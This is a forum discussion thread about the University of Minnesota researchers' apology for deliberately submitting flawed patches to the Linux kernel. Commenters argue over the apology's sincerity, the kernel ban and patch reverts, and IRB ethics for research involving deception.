> If every white hat has to get permission from exponentially large dependency chains

They don't. They just have to get permission from someone in authority. Different open source projects have different governance structures. Sometimes that is a single person.

> The blackhats set the rules of engagement, for better or worse. White hats should be free to go for it just like with any other vulnerability they evaluate.

If you are hacking someone else's system without their consent (not to mention for your own personal gain), you are a blackhat. By definition. Pretending to be a researcher doesn't change that.


> you can hire

therein lies the difference, duh.


And what about the hundreds of NPM dependencies in VS Code no one reviews?

Or the thousands of brew packages that are blindly merged unsigned by 800 people with access?

Who pays to give a white hat as much freedom to find supply chain attack vectors here? Who gets consent from every random student whose code, if compromised, would compromise every major company?

We have created a massive mess, and I don't know that we will be able to hire enough researchers to fix it.

We are going to need unpaid volunteers, and a lot of them.


holy moving the goalpost batman, slow down.

> We are going to need unpaid volunteers, and a lot of them.

that's absolutely orthogonal to the question at hand; it's not a matter of paid or unpaid, nor of being a volunteer or not: it's a matter of consent.

if you don't seek consent beforehand, either via a contractual relationship or a sponsored bug-hunt program or the like, you're a racketeer, not a white hat, and you should (and will) be treated as such.


Going further, "with" seems like the wrong preposition. "On" seems more accurate.


The professor is not a native English speaker. I’d cut him some slack on minor issues with his word choice.


It would make sense if they were talking about mice, in which case "on" is still more accurate but "with" is probably correctly assumed to be equivalent. Research with humans involves them being on the author list...


Additionally, wouldn't the right thing to do, alongside their apology email, be to also state that they have retracted the "hypocrite commits" paper from IEEE?

After all, before the ban there were complaint(s) made regarding this paper by other researchers and community members.


This falls under behavioral research. I believe psychologists have solved the problem of how to do research that is both blind and in line with ethical standards. All they had to do was ask one.


I also found the apology lacking in that they did not specifically acknowledge that they were indeed experimenting on people.


Is it now not P.C. to discuss what they revealed? Or has "nothing" been revealed?

Are we not allowed to discuss the possibility that someone hacked a university email address and then submitted a patch?


You're being too coy. What do you think was revealed?


The thing I’m still missing is a detailed explanation of what the heck was going on with the recent bogus commit that triggered the banning. Supposedly the “hypocrite commit” research was all done in 2020 and is now in the past. So what was going on with this latest bad commit?

The student who submitted it claimed it was generated by a static analysis tool, which kernel maintainers have plausibly called bullshit on. Was that student lying? If so, what were they actually doing? If not, it seems absolutely necessary at this point to prove that they were telling the truth by publishing how that commit was produced, including the tool’s source code and how it was invoked.

Even if the campaign to intentionally introduce security flaws was over in 2020, the more recent issue is that the same research group submitted an apparently intentionally incorrect patch and then seems to have lied about its provenance and why it was submitted. Until that’s cleared up any kind of apology feels premature and impossible to evaluate. How can anyone decide if an apology is sincere without understanding what was done?


The latest patch adds a null check around a call to gss_release_msg. The commit message says “The patch adds a check to avoid a potential double free.”

According to other people in the conversation, this is already taken care of by reference counting (https://lore.kernel.org/linux-nfs/20210407153458.GA28924@fie... ) and the patch apparently does nothing. The commit doesn’t reference any specific tool they’re using, or any bug they faced.

Looks innocuous, but I guess past behaviour from this group left enough of a bad taste for Greg KH to be suspicious.


A later message claims (outraged at being accused of submitting intentionally broken code to the kernel, despite having previously done exactly that) that the patch was generated by a static analysis tool. Ok, what tool? How did you run it? The message where he claims this has since been deleted (by who? Edit: probably never sent to the list, see below) but here is a message from Greg KH which quotes it:

https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah...

You can see that Greg KH is skeptical that the patch was generated by a tool. It’s also unclear to me if the patch is actually harmless or not. It would be good to get some definitive clarity on that but the lkml discussion of it seems inconclusive.

I would add that the student’s tone in this message feels really familiar as an open source maintainer: this is the tone of someone doing something they know is bad being called out on it and trying to deflect with outrage. The last time I got that tone, it was someone who had created multiple sock puppet accounts to try to discredit my project and force moderators to reverse or apologize for a (completely justified and mild) moderation action. So I can’t help but feel that something fishy is going on here and the UMN research group still isn’t being honest about it.


My understanding is that the "not found" messages were never archived, rather than deleted. Likely they were not CC'd to the list, and the replies added the list back to CC.


Cf https://lore.kernel.org/linux-nfs/YIUMYYcf%2FVW4a28k@kroah.c...

Apparently, they sent html mails, which the list refuses to deliver.


Thanks for explaining that!


My experience of GKH's work isn't generally very favourable, but my estimation of him has been increased by this repair. He's created work for himself, but it needed doing. Credit where it's due.


> Looks innocuous, but I guess past behaviour from this group left enough of a bad taste for Greg KH to be suspicious.

The idea of the kind of research they previously did is to submit patch requests with some kind of trick or hidden agenda first, then do some analysis of the results, and then later on publish a paper explaining what they did.

Now here they are again submitting a weird-looking and seemingly poorly conceived patch. Who knows what they're really doing? Perhaps they're working on some kind of new paper, with who knows what purpose. Maybe we'd find out in 6 months. Maybe it's a failed line of research similar to the previous ones which they won't actually publish. Or maybe they just have no idea what they're doing. Either way, it seems like a waste of time at best. The mass ban and revert sounds like an appropriate move.


I'd like to give them the benefit of the doubt, but this is written like an apology they know they must write. It does not come across as apologetic. It comes across as rationalization veiled as an apology, and it doesn't sit well with me.

I hope I'm just being overly sensitive here.


Indeed. This letter is an attempt to justify and rationalise their actions. Essentially, it amounts to saying "we're sorry you were offended and felt hurt by our legitimate work but we had no choice but to lie to you and unethically experiment on you without your consent or we wouldn't have been able to do it". Their statement is not an actual apology, even if it is phrased in the language of apology, and it is an excellent example of what not to write if you are seeking forgiveness.

The core issue here is that the system under which they were working, and the researchers themselves, did not consider this work to amount to unethical human experimentation - even though the work directly involved infiltrating and exploiting humans and human social systems. There is no mention of this nor of any substantial desire to understand or address this systemic failing and, until there is an unconditional acceptance of responsibility for the harm caused and a real actionable change for the better with accountability, I don't see how we can consider this matter to have been apologised for.


Agreed. This is like a psychologist apologizing for traumatizing children by testing a hypothesis that telling them scary stories before bedtime would give them bad dreams. "Oh, but it's important to learn what scares kids, for the greater good" just doesn't cut it.

Software is complex. Wasting maintainers' time is harmful to the maintainers and to those who use the software. If the goal is to explain what sort of exploits to be on the look-out for, just write the paper without doing the exploits.

As for the letter, their goal is to recover their reputations, not to apologize. I suppose a lawyer helped them in spots, but there is still a certain truth that shines through: they want to continue on doing this sort of thing, because they are oh-so-clever and their work is oh-so-valuable. Nice try, but the academic community may be better off without these folks doing this sort of research and influencing students to follow their methods.


Just curious, and I'm genuinely asking as someone who thought the letter seemed well-intentioned: what should they have put in the apology letter?


> We are sorry for the harm we've caused by our unethical experimentation involving members of the Linux community. In accordance with community standards and a desire to avoid benefiting from our ethical failure, we have requested the immediate retraction of the papers and other published work resulting from this unethical experimentation. We are also working together with our institutional leadership to address the systemic and individual failings which permitted this unethical research to take place. As a result of this, we will publicly prepare a report regarding the actions taken and potential systemic changes which will ensure these actions do not reoccur and further harm is not caused. Out of an abundance of caution and because experience has shown our judgement, as is, to be questionable, no further research similar in nature to the research in question will be undertaken by this institution or these researchers until proper community consultation has taken place regarding the report and proposed changes to systemic review are implemented. Once again, we take full responsibility for any harm we have caused and we will work to ensure that such harm never occurs again. We hope that, at some point, we may regain your trust and confidence and, if you'll permit us, to work alongside you.

[signed personally, by every involved researcher, professor, IRB member, and all of the relevant university leadership including the board]

Something like that would do nicely, in my opinion. Then they'd have to absolutely follow through on it. Ideally, they'd also ask involved members of the community so harmed, among other experts, to independently review and watch the process to ensure no further harm is being done, progress is made, and public accountability is kept.


Good suggestion, especially getting the IRB involved. The board failed to recognize that the target of the research was not inanimate software but human beings.


Thank you and my point precisely. This was both an individual and systemic failure and must be treated and rectified as such with all due seriousness.


I'd consider that a pretty good apology, if that were the one they had made. I'd like to see it expressed by the university ethics board, not just by the researchers.

I wouldn't trust those researchers again, not for anything. Free software depends heavily on trust. It's astonishing that it works so well; but if you break trust, it's very hard to repair the fractures.

The legal arrangements around free software are fairly fluid, because there hasn't been much case law, because there's not much money sloshing around for free software developers to pay lawyers. Banning pull requests from that college is much cheaper than suing.

I hope the whole uni stays banned until the ethics board issues their own apology.

Then let it go, I say. People make mistakes. We shouldn't blame everyone for the mistakes of a few.

But we have to protect the Linux kernel; billions of people depend on its correctness.


That makes sense, thanks!


> we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

This bit just reads like "sorry you're upset".

I would have expected something along the lines of "sorry, we should have asked the maintainers and we understand why it was wrong not to", instead of "sorry, we didn't ask the maintainers, but this is why we didn't".


"It's just a prank dude!"

Legitimately, these folks have some kind of personality defect. They observed something that everyone already knew and then decided to act on it and pretend they were doing something interesting and new rather than just being twats. They should be judged by their actions, regardless of their claims of being researchers. This would be a perfect cover for being on the take from a government agency. They should be investigated to ensure they aren't actually malicious actors.

It takes almost no imagination to think of hundreds of "security vulnerabilities" in the world, yet the vast majority of people realize that it's dumb to act on those observations.


I am not a stakeholder in this, and my comment is about apologies, even though as a lifelong linux user and technologist responsible for deploying it, I still think there should be a real investigation.

While I had a bunch of notes about what makes the sentiment behind an apology meaningful, it's really separate from the issue that this should have been done privately. A public apology is just another thing about them and their message. They're performing and trying to draw in sympathetic members of an imaginary audience. There is no humility in public displays. I would be surprised if anybody asked for it, and doing it without asking is just more of the same type of behavior. There is no such thing as a public apology.

That said, I have no doubt they have suffered personally over this, and I have some compassion for that suffering itself, but no sympathy for this performance. There is no gesture that restores trust. When their contributions and accomplishments become more remarkable than this issue, they will have restored it, but like most things, there is no "back" to go to. Maybe that static analyzer will be the ultimate bug finder, as succeeding at that is probably their only way out.


It's not so much a question of what they should have put in but what they should have left out. There was an awful lot in there justifying what they did, and relatively little that acknowledged that it was wrong.


They should have addressed why the kernel maintainers felt the way they do. As it is now they are trying to rationalize their actions instead of showing they have made an attempt to understand why their research was questionable.


Maybe I am being very naive here, but that letter read like a sincere apology to me as well.


I think if it were a sincere apology, they would have apologized for what they did, not just that there were undesirable side effects of their research. The letter is a typical "I'm sorry you got mad" apology that people make when they're forced to, but don't think they did anything wrong.


People love to analyze apologies after the fact, but it seems totally unfair to me. Once someone has said an apology you can take the text of it and turn it into anything you want and say it proves they were lying.


A good apology needs to demonstrate an understanding of why what was done was wrong, and ideally includes concrete steps that will prevent anything similar from happening again.

You seem to be implying that one apology is as good as another, and that is absolutely not true. To me it is absolutely unfair to expect that people will treat a zero-effort "sorry your feelings were hurt" apology the same as a deeply heartfelt apology by someone who feels real remorse.

By its nature, an apology should be an act of making amends to a person you have wronged. If the words of your apology don't do that, you have failed, even if you had good intentions.

If the author of the apology isn't a native speaker of English, this seems like a document of sufficient significance to merit asking a friend or colleague for a proofread. (Which you should do in a case like this even if English is your first language.)


Yep, it's called accountability. Would you prefer people acted without regard for others knowing that magic words can be spoken after the damage is done?


I would prefer you not go around saying someone is "apologizing wrong" because you've found the magic formula to turn all apology text into "I'm sorry you feel bad". There's no point in making a statement like that the original person can't respond to, anyway.


I get what you're saying and I don't want that either. But I also don't think a simple apology that doesn't attempt to justify one's actions can be so easily flipped.


The researchers can no longer be trusted at all. The apology should have come from the University ethics board.


I agree. There are weasel-words throughout, starting with apologizing for "any harm". When you've been told what the harm was, don't apologize for "any harm" you might have caused. You should start an apology by demonstrating that you have listened and understood exactly what harm you caused.

Listing the harm you caused is also an important part of the public record, so that anyone else considering a similar scheme in the future can see what consequences were agreed to have happened the last time.


Yeah, it's not a great apology. As far as justifications go, I think there's a certain level of depth expected from academics; you shouldn't overthink it.

As far as giving the benefit of the doubt, it was likely not done out of malice in the first place. Just a combination of poor reasoning, and it's not exactly clear whether they even considered alternatives to control their variables. Unfortunately, it seems like they were already given the benefit of the doubt after their first offense, but did not take any lessons away from that, so it would be understandable if the maintainers kept their ban.


I don't think they had malice, but the breach of elemental ethics is just appalling. They show no remorse for being trusted and abusing that trust and good faith. They show no remorse for using human beings as involuntary guinea pigs.

In sum, they show no remorse for doing wrong.


For me, it's not learning the lesson the first time around.

I completely agree their experiment is unethical. However, the ethical bounds of their work are not actually clear-cut to most researchers, especially for studies of areas that have never really been explored before. Ethics in and of itself is largely an active subtopic for many areas in CS, not only security research. AI is one area where qualifying potential harm to human beings remains largely controversial. Ask any ML scientist, and they'll tell you that determining the ethics of a project is not their responsibility.


I could not disagree more.

The ethics around research that involves deception have been pretty well established, and there are several good comments here explaining them.

Every scientist is personally responsible for the ethics of the research they conduct. Full stop, no caveats allowed.

If your research is in an area where the ethics are controversial or grey, that means you need to spend MORE time considering the ethics of your research, not that you get a free pass from being responsible.

If any scientist espouses the opinion that determining the ethics of their projects is not their responsibility, they should be permanently barred from receiving grant money.


> The ethics around research that involves deception have been pretty well established, and there are several good comments here explaining them.

Ethics in computing research remains an active research area. This incident will be used as a case study in the future, but it's not that well established. Many people have been offering anecdotes, which honestly don't fit the scenario because so many variables and parameters distinguish other types of pentesting from this. And disappointingly, not a single post has actually produced the documents that establish this.

Arguably the first set of guidelines for ethics in computer security research [1] was published in 2012 and not yet widely taught in Ethics lectures (I only know about it because I learned Computer Security from one of the authors).

On identifying harms:

> "Challenges identifying harms in ICTR environments stem from the scale and rapidity at which risk can manifest, the difficulty of attributing research risks to specific individuals and/or organizations, and our limited understanding of the causal dynamics between the physical and virtual worlds. As with all exploratory research, it can be challenging to articulate benefits such that subjects can make informed decisions. In ICTR our ability to qualitatively and quantitatively foresee the probable benefits is particularly immature."

On this type of research:

> "Research of criminal activity often involves deception or clandestine research activity, so requests for waivers of both informed consent and post hoc notification and debriefing may be relatively common as compared with research studies of non-criminal activity."

This isn't a huge change from 30 years ago since Moor [2] wrote his thesis on Computer Ethics, see:

> "A typical problem in computer ethics arises because there is a policy vacuum about how computer technology should be used. Computers provide us with new capabilities and these in turn give us new choices for action. Often, either no policies for conduct in these situations exist or existing policies seem inadequate. A central task of computer ethics is to determine what we should do in such cases, i.e., to formulate policies to guide our actions."

Researchers themselves are far from educated on this topic; you won't ever explore this in depth unless you're in this particular sub-field. IRB/REB boards are considered the most qualified but are possibly too outdated to navigate around this. It's a whole mess, there is currently a lot of questionable research in many areas of computing, but the clock moves forward.

[1] https://www.dhs.gov/sites/default/files/publications/CSD-Men...

[2] https://web.cs.ucdavis.edu/~rogaway/classes/188/spring06/pap...


Great insight. But as for the ML scientists you mention, ethics _is_ their responsibility. We all are ethical beings.


How is malice different from a breach of elemental ethics? How is malice different from abusing trust and showing no remorse from doing wrong?

These guys are malicious clowns, who came up with an idea that would hurt Linux, but advance their careers, and they went all in on it.


I don't think you're being overly sensitive.

To me, it's always a distinct sign that an apology isn't sincere when it hedges apologizing for "any harm" that they might have caused. In my mind, a sincere apology clearly acknowledges harm that has been caused and apologizes for that.


The kernel community isn't a spurned lover or anything; the apology just has to admit fault, promise not to do that again and be truthful about it.

There is no need for the researchers to be in any specific state of mind or even apologetic as long as they don't try to submit bad faith patches again.

Really the only reason there is even a need for a public apology is to signal how much pressure they are under so other people think twice before doing the same silly thing. Otherwise they could just apologise to the maintainers directly.


I agree, but let's give them a little extra benefit of the doubt. I thought as I was reading it that it seemed stilted and forced, then I wondered if the author(s) don't speak / write English as a primary language.

I'll be interested to see how they react to feedback / responses.


> We just want you to know that we would never intentionally hurt the Linux kernel community and never introduce security vulnerabilities. Our work was conducted with the best of intentions and is all about finding and fixing security vulnerabilities.

Either this is a bald-faced lie or they didn't think through the implications of their research, neither of which bode well for their trustworthiness in future. However, if it's the latter, then they possibly deserve additional leeway.

On the other hand, I wonder whether this letter would have eventuated without the ban - if not, then they've likely been forced to write it, in which case any remorse is either selfish (i.e. they've been professionally reprimanded and feel bad about getting caught, or making such an egregious error in judgement), or hollow.

> I agree, but let's give them a little extra benefit of the doubt. I thought as I was reading it that it seemed stilted and forced, then I wondered if the author(s) don't speak / write English as a primary language.

https://www-users.cs.umn.edu/~kjlu/

It looks like you might be right about this, but I think that reading it as stilted and forced is still accurate.


The wording is definitely stilted and forced, but the content is also wrong for an apology. They spend a lot of time justifying their actions, and close with "this has been painful for us too". This may also be cultural, but it's overly self-centered for an apology.


I was just about to post: "This is a great apology."

Context is everything, of course. I think you're right that it's tainted by the fact that they absolutely did not have a choice, and coming from people who've deceived the same tribes they're now trying to apologize to.


I think they could have really helped themselves by being humble and truly apologetic. Simple things like:

- "We are sorry for the harm we caused" instead of "We're sorry for any harm we caused"

- Not trying to explain their actions in the first paragraph of the apology! I think most folks are aware of their intent by now, and leading with yet another explanation just makes the whole thing feel disingenuous

- Avoid saying things like "this has been painful for us as well"

Unfortunately, it has so many hallmarks of a non-apology, and it's hard to look past those given the context.

As others have mentioned, they can clear this up with their actions going forward, but it will take time to rebuild trust.


> hallmarks of a non-apology

Is that a thing? Like there's some non-apology Bingo card you can fill out? I don't see a connection between the criteria you listed and genuine-vs-false contrition.

You may perceive these things one way, but ultimately you can't know the minds of others well enough to tell if they are sincere or not about anything. You don't get to just declare yourself the arbiter of their feelings because they used "any" instead of "the".


There literally are bingo cards, yes!

https://www.google.com/search?q=non+apology+bingo


Thanks, I hate it :]


Does the difficulty of knowing others not put something like this in the court of opinion?

I would expect it to be, and I would minimize attempts to marginalize my apology by using direct, precise, and inclusive language.

For every word created or omitted to those ends, the number of negative comments will be reduced.

Fact is people take it how they take it and feel what they feel.

There really is no "can't" in any of that.

...which is why the consistent feedback to those ends is here in the discussion.

How else is this to be done and be meaningful, not easily gamed?

Serious question.


I wish I knew.

I tend to have pretty dry affect at certain hours of the day, which has caused considerable frustration for myself and others when I know I'm sincere but they don't. Nor does it make much sense to me for that sort of mind-reading to take place democratically. What do we then gain from it?

At best, you get an apology for a misunderstanding over the previous apology, plus a second draft that the masses might like better. Then you still get that lingering contingent that says "you just did that to placate people! Now we really know you don't mean it!"

The cultural apparatus for "Saving Face" is completely broken on a build failure for missing dependencies.


And what of the merits? If the previous 190 patches were indeed legitimate it strikes me as overly vengeful to pull them in a "punish the son for the sins of the father and the father for the sins of the son" kind of way.


I don't think it's particularly vengeful. I think it's a pretty natural result of the broken trust.

Yeah, the authors are claiming those past 190 patches are fine... but they also essentially did the same thing when they submitted the intentionally bad patches too.

So the question is, how much do you trust them right now? And given they just submitted intentionally bad patches, I don't think it's very surprising they don't have a whole lot of trust.

And if you don't trust them, then you've got 190 patches active from an untrusted source with a history of submitting bad patches. That's not a particularly good situation. Why wouldn't you revert them?

The specifics of the situation make the whole thing substantially murkier, in my (entirely unrelated) opinion. But take a broad enough view, and this is pretty much the default path. However the specifics make this a bit of an oddly exceptional situation, all things considered.


Or it's not in vengeance, but caution after the researchers have demonstrated that they put their needs above the community's. When the presumption of innocence is lost, it's appropriate to revert the patches until they are known to be good.

ETA: GKH on reverting the patches[1]

> This patchset has the "easy" reverts, there are 68 remaining ones that need to be manually reviewed. Some of them are not able to be reverted as they already have been reverted, or fixed up with follow-on patches as they were determined to be invalid. Proof that these submissions were almost universally wrong.

[1] https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...


counterpoint: The LF Technical Advisory Board is taking a look at the history of UMN's contributions and their associated research projects. At present, it seems the vast majority of patches have been in good faith, but we're continuing to review the work. Several public conversations have already started around our expectations of contributors.

https://lwn.net/Articles/854064/

What the authors did is wrong, but so were GKH's actions. Let's be honest in calling BS out.


Agree that it could be seen as excessive, but this was not just in response to these commits, but also to the university's failure to act once they were informed of them.

The university, and indeed the researchers, only acted once the ban was imposed - i.e. they were getting away with it without reputational damage, and only once their reputation was stained did they actually do anything.


The patches are pulled so they can be reviewed carefully before being re-applied, not as a punishment.


Ah that makes more sense, thanks.


Why would you trust anyone who pulls this kind of stunt? IMO pulling all commits pending review and banning future commits is a reasonable precaution, particularly given this disingenuous apology and the failings of the University oversight board.


Problem is, hardly anyone is spending money on lawyers to defend Free Software. So the cheapest way to defend Free Software is to ban submissions from people who have a record of submitting crap.

Blocking an entire University seems extreme; but just think of it as a sanction on the University's ethics board. I think a (short, and very explicit) apology from the ethics board ought to suffice, to get the Uni off the hook.

And I think those researchers should not be allowed near Free Software again, unless their pushes are going to be rigorously scrutinised.


The developers likely see a systemic problem, not just this group. That very significantly expands their scope of action.


Social media insanity has greatly reduced our capacity to accept public apologies at face value. There is always a seething mob that is ready to question the sincerity of the apology once there are no more demands left to be made.


Not really.

Well constructed apologies are hard to seethe over.

This one could be better.

Many, myself included, believe it should have been.


You're not. It does not come off as apologetic at all. It is clearly someone writing as if they wanted to go back in time and act like they legitimately were caring, thoughtful people who made a mistake. In fact, they thought this was worth trying and got caught.


There's no apology they could have written that would not result in some people saying it was insincere.


As of now, it's just words on a page. Let's see how their actions back up those words.


> It does not come across as apologetic.

The words are there. It's not up to us to decide if they're "genuine". No one's a mindreader.

The tendency to view apologies as fake seems more often to reflect how harshly we view the one making it.


Their opening statement has the most classic of all non-apology tactics: "We're sorry for any harm we caused". Maybe this wasn't their intent, but this is one of the oldest "say the words without having to mean anything" tactics in the book.

It's like telling your partner "I'm sorry if I hurt you". No, you hurt them. Apologize for hurting them.


An apology should be for actions taken, not for how the other party felt about it. Acknowledging those feelings is important, but taking credit for those feelings takes agency away from the other person.


I don’t think that really makes sense. Often in a personal relationship the “action taken” will be innocuous considered in itself. But you may have done it knowing full well that it would hurt the other person’s feelings. In a case where the person’s feelings are totally irrational and you had a strong independent justification for taking the action, it does get more complicated. In general, though, I think it’s a huge mistake to assume that you should never apologize for hurting someone’s feelings.


I don't think you can take the action outside of the context in which it is performed. If you take action knowing another person is likely to feel hurt, are you... not sorry you took that action?

Regardless, you can't genuinely apologize for things that aren't in your control. (You can and should empathize and sympathize with their feelings about it.) It may be a convenient fiction at times, but there are many downsides to this type of boundary blurring. I think you do the recipient a disservice by implying they have no agency—especially if they believe you. You also face the danger that your apology seems insincere or you misjudged their feelings, which could actually make matters worse.


I don’t really buy the idea that other people’s feelings are entirely within their own control and not at all within my control.

If we really had complete agency over our feelings then I guess we’d all just choose to feel great all the time. Doesn’t seem to work that way.


Suppose my sibling and I call each other 'ugly' as a greeting and we normally enjoy this behavior. If one day I feel hurt, is my sibling responsible for that feeling? If yes, is my sibling responsible for the depth of that feeling? Even if, on this particular day, I feel more hurt by the comment because I had just broken up with a partner? Is my sibling responsible for the duration of the feeling? Even if my response to the experience is to repeat the comment over and over in my head even after my sibling apologizes? Is my sibling responsible for all the decisions in my life (including encouraging that behavior) that have led me to be sensitive to the comment in that moment? Am I powerless to change (whether in the near term or long term) how I respond to that comment, whether through meditation, therapy, confidence training or whatever? Am I also powerless to remove my sibling from my life?

In my view, the extent to which we can influence the emotions of another is the extent to which the recipient themselves has given implicit permission to do so; which is to say, they have agency. I don't think that simplifies into being able to choose to feel great any old time we like. I also don't think it at all excuses bad behavior or justifies a lack of empathy. But I will say that I feel a lot more good moments and less frequent and intense bad moments since I adopted this view and took responsibility for my own emotions.


This highlights the importance of apologizing for the impact something has, vs. just apologizing for the act itself.

There is no universal rule that can be applied to determine when one vs. the other is appropriate, but seemingly innocuous actions can have negative impact, and apologizing for the innocuous thing may not always make sense.

To be clear, this is not universally true. There are situations where apologizing for the action makes sense, and situations where the action that led to a negative outcome are either inconsequential on their own, or there might be a myriad of factors leading to the need for an apology.

Apologizing for the action can also come across as disingenuous or passive aggressive in the wrong context. This is especially true when the action is well-intentioned, but has the wrong effect. Taken to an extreme, this sounds like "I'm sorry I tried helping".


I think your sibling should apologize for hurting your feelings by calling you ugly.


That loss is accountability in action.

Agency returns as trust does.


"We're sorry for" =/= "We're sorry if..."

The phrasing is such that it acknowledges harm was done. It's an apology, full-stop.


You don't have to be a mind reader to see that this apology isn't an apology. They spend as much time justifying their actions as they do apologizing for the unintended outcomes, and they close by complaining that they've also been hurt.


Explaining intent isn't the same as justifying. That's projection.


Apologies are really difficult to do.

You have to acknowledge (in full) what it is that you are apologising for. That's the most important thing. Promises are meaningless.

It's not possible to "be genuine"; especially in a public post, nothing is genuine, everything is PR and smoke. Both the researchers and their ethics board need to grovel. If they did that, this tornado-in-a-teacup could be over in a month or two.

But keep those researchers banned.


No one should have to "grovel" for an apology to be effective.


The ethics board were asleep on the job. Grovelling is probably less painful than falling on your sword.


They didn’t have to write it.

The first two sentences seem sincere. This reads as a real apology.


They didn't have to write it if they wanted the whole university to stay banned.


Exculpatory apology


There are some relatively minor issues with this apology that appear to already have ample discussion here, and I'll not repeat it. I want something more: I want to hear from the sponsoring faculty, research ethics board, and editors of the journal that published the article. There appear to be some systemic issues in addition to the investigators' ill-considered project.

How was it that this research, which is clearly unethical, ended up being published? I've sat on an IRB: this study would not even have been a close call. Did sponsoring faculty even send it for IRB approval? Did they disclose that they were misleading their subjects? If so, did the IRB approve it? Did it make any recommendations? When submitted for publication, did they state they had IRB approval? Did they disclose that they were misleading experimental subjects? Did any reviewers express ethical concerns? Were the ethics of this study discussed by editors?

Because there are either some serious systemic flaws in the review and publication process for this paper, or the investigators engaged in serious misconduct. If the latter, an apology (while absolutely required) is far from sufficient to address the issue. If the former, then there are several other apologies due, along with confirmation that the process will be reviewed and corrected.


Another query about IRB and human subjects: In the case of software which is not only written/maintained by a community of humans, but used by a (vast) community of humans, do the latter also become "human subjects" as well in such an experiment?


Only one of those groups is having their time and effort squandered. To me, it comes down to whether someone is being harmed. Researchers use statistics and anonymized demographic data on large populations all the time. You could argue that the population in question have become research subjects, but (1) they are not being harmed and (2) they are not being actively misled by the investigators. The moment this group started submitting patches in bad faith, they were actively misleading their subjects, and they are harming those subjects by using their time and effort without consent.


What are your thoughts about this article[0]? My reading of the article is that the author fails in a similar way (to some extent) as the researchers, and there's IRB discussion in regards to the ethics of such research.

[0] https://dave-dittrich.medium.com/security-research-ethics-re...


IANAL, but the claim that this research was exempt under 45 CFR 46.104(d)(2) seems suspect to me. (i) doesn't seem to apply because Linux kernel developers are required to go by their real names for licensing reasons (cf. the rules regarding Signed-off-by). (ii) seems dubious given that the authors themselves argue that they need reviewer consent to release information about the authors' malicious patches. Note in particular that both exemption categories are concerned with what information the researchers have ("information ... recorded" in (i), "any disclosure ... would not" in (ii)), not what they publish, so the idea that they need consent to publish this information seems to imply that they needed consent to collect it.


My biggest point of confusion from the article is that the regulation(s) do not require explicit consent from human subjects for the use of their time, irrespective of what information is collected.


Both this guy, and the researchers themselves (in their article), suggest that the kernel add "don't submit known-bad patches" to their code of conduct.

So it's sort of hard to take them seriously as human beings, and not just caricatures.


It's an insightful review into some of the issues and regulations around this. I'm not American, so our local rules are different, and I resigned from my institution's IRB several years ago, and these issues have become more fraught in this period. However, the way I was trained to look at these issues was around the concepts of harm, both actual and potential. In this particular case, as Dittrich notes, the questions are around the ethics of using deception in research. Deception does have a role in legitimate research. Arguably, double-blind experiments, the sine qua non of medical research, have a fundamental component of deception. They also represent the most common way the ethical dilemma is resolved: subjects are told that they may be deceived, and they have an opportunity to give informed consent. That could have been done in this case: have project leads inform people working on the project that, in the interest of evaluating the patching process, patches that are incorrect or which introduce vulnerabilities may be submitted by researchers. That, of course, would require some senior members of the organization be aware the study was going on. That last is the way penetration testing and red team investigations of security resolve the ethical question---and distinguish themselves from mere vandals and criminals.

Other ways to resolve it include collecting data without deception: instead of introducing flawed or malicious patches themselves, researchers identify such patches that have historically been submitted and then review the processes that led to their acceptance or rejection. This is more difficult, but might arguably produce better results. In the case that there are few or no such cases on record, then I would question the value of doing the study at all: deceiving people to study a phenomenon that doesn't appear to occur at an appreciable rate is difficult to justify.

There's a simple heuristic: if you're studying a group of human beings that you are not a member of, and for which no members are consciously participating, you must be extremely careful. The general rule in anthropological and sociological research is that you do not lie to your subjects. There are cases where the value of the research is sufficient, and for which no other options are available, to break that rule. But they are rare and the utility must be clearly shown and carefully reviewed by a qualified third party. This experiment doesn't come close.

There will certainly be those willing to argue that this isn't human experimentation and thus does not require ethical review. If your experiment depends on misleading human beings---directly or by omission---then it requires an ethical review. It is unethical to waste people's time to no purpose. In the case of an open source project where volunteers are donating their time, it is particularly egregious: they were squandering volunteers' time. In effect they were destroying part of the contribution people made to a project they care about. That requires a very clear justification, which this particular project absolutely does not provide.

I recall a conversation with other IRB members shortly after the Sokal Hoax became known. Our general consensus was that it was hilarious but absolutely unethical if considered as an experiment.


Thank you for such detailed response.

Can there be an ethical possibility (a highly remote one) where a study (assuming it is objectively justified) is conducted with deception, but without any prior informed consent at all? (e.g. the human subjects will not know that their time is being used for another purpose)


Doesn't this happen all the time? Many psychology studies are done by bringing in test subjects, asking for their consent to be interviewed or tested under the guise of studying X, when in fact the researchers are looking to evaluate Y instead?

E.g. I, the researcher, ask if you consent to spending 30min completing a series of tasks to sort objects by their shape, presumably because I want to study your ability to recognize shapes. However, what I am actually studying is the group dynamics: how well you and others in the group cooperate or have conflict over your tasks.


TLDR: Yes, but deceiving a subject about the details of how they are being studied is different from deceiving them about the fact that they are a research subject.

Yes, this happens all the time. But note the salient features: (1) the subjects are aware that they are research subjects and have agreed to participate (albeit without full knowledge of how the collected data will be analyzed). They have agreed to be studied, and have agreed that their time may be used in pursuit of this research. (2) All such studies undergo a very stringent ethical review and are usually monitored closely by third parties (at least since Milgram made it extremely clear that this was a necessary policy). These issues are complex and difficult to navigate---which is precisely why we have review boards. Every experiment has to be evaluated to balance the requirement to act ethically with the value of the research data to be collected. Skipping that requirement is unacceptable.

In my experience, the moment a research team starts looking for reasons not to classify what they are doing as human experimentation is the moment when it becomes extremely clear that they need board review.


Out of curiosity, can a study where humans are deceived about the fact that they are research subjects be justified in general? (to me it seems like the correct answer is no)

Some relevant cases: the Facebook case[0] suggests it is justified because of the EULA, and the court's determination test[1] is complicated for me to comprehend (to be honest), but seems most relevant to this discussion.

[0] https://www.theatlantic.com/technology/archive/2014/06/every...

[1] https://casetext.com/case/sandvig-v-barr


I'm not qualified to comment on legal issues and contracts. In the case of EULAs, my understanding is that no contract where you surrender fundamental rights is valid or enforceable. But even then, I'd want a lawyer's advice before assuming it. And, of course, that's a good argument for reading EULAs very carefully.

